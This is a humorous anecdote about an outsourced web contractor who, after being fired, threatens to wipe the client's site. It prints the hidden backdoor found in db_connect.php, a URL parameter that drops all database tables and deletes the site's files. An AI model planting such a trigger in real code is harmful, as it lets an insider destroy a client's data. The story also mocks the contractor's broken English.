You get what you pay for. Ondra M didn’t use those exact words, but that’s effectively what told his friend and colleague, Derrick. “There’s a reason it costs one tenth as much to build in Kerbleckistan,” were Ondra’s exact words, “there’s not only the language barrier, but time zone differences, cultural diff—”
“It’s just code, which is just a bunch a bytes!” Derrick shot back, “who cares if it’s built here, there, or on the moon. I’ll just take the cost savings and put them towards advertising. ”
Ondra didn’t push the point any further. After all, over the years he had come to learn that Derrick knows best, no matter what reality says. Besides, it was Derrick’s money, Derrick’s idea, and Derrick’s baby. The only involvement Ondra had in the project was to lend some unused rack space.
It was the least he could for his friend who had, once again, come up with the Best Idea Ever. And this one was truly the best. It was some sort of Web 2.0 site that involved freemium, collaboration, engagement, and all sorts of other buzzword concepts that Ondra was clearly behind on understanding. Either way, Ondra set up a server, gave Derrick the details, and wished him the best of luck.
Not Enough Luck in the World
After over six months of parroting “the project’s going great!”, Derrick finally changed his tune.“Let me level with you,” Derrick painfully admitted, “I’m in a serious bind, Ondra, and I need your help. I think I could lose everything.”
Ondra held in a much-deserved told-ya-so and let his friend explain what really happened over the past half year. After interviewing a slew of candidates from Kerbleckistan, Derrick settled on one who had “many year experience building web” and could complete the project in “two month, three maybe.” Derrick’s arranged to pay this contractor a monthly fee and, in turn, the contractor would meet pre-established weekly goals and push his code changes to the server every week.
As the weeks passed, the goals slipped by and the excuses started to grow. "It does working on my machine," "I have missing your email," and "this is first time problem" were becoming all-too-common. At one point, the development just stopped: no new changes were uploaded and the database remained untouched. After nearly a month of no progress, Derrick fired the Kerbleckistanian, disabled his server account, and told him not to expect a check for the past few weeks of “work”. And that’s where the problems started.
“This is not fair,” the contractor wrote in an email, “I was about to uploading files. It is good codes, ready for you. I programming this, so then you pay me and I sending you files.”
Derrick stuck to his guns and refused to pay the contractor another dime.
“If you don’t paying, then I delete files that I send you,” he responded, “I don’t want deleting your web, but it is not fair for me. I know you changing my password and I can’t logging on, but I don’t needing SQL or server password to delete.”
It was that last part that was the most troubling to Derrick: could he actually delete files without FTP access? Derrick fired up his shell access and executed a simple command to see if unlink (PHP's function for deletling a file) was used.
cat *.php | grep unlink
The first and only page that showed up was in db_connect.php, which was included by all pages.
// maybe I needing later if ($_GET['page'] == "delete_all_files"){ echo "del"; mysql_query("DROP TABLE *"); unlink("index.php"); unlink("apps.php"); unlink("resources"); ... snip all files ... }
That's right — it was a back door that deleted all database tables and files. All the original programmer (or, anyone else) would have to do is access any URL and enter ?page=delete_all_files
in the URL.
Fortunately, Ondra was able to remove the backdoor before the Kerbleckistanian could access it. Well, maybe not fortunately; the rest of the code was pretty awful and was probably better off being deleted. But at least it was one-tenth the cost of doing it right!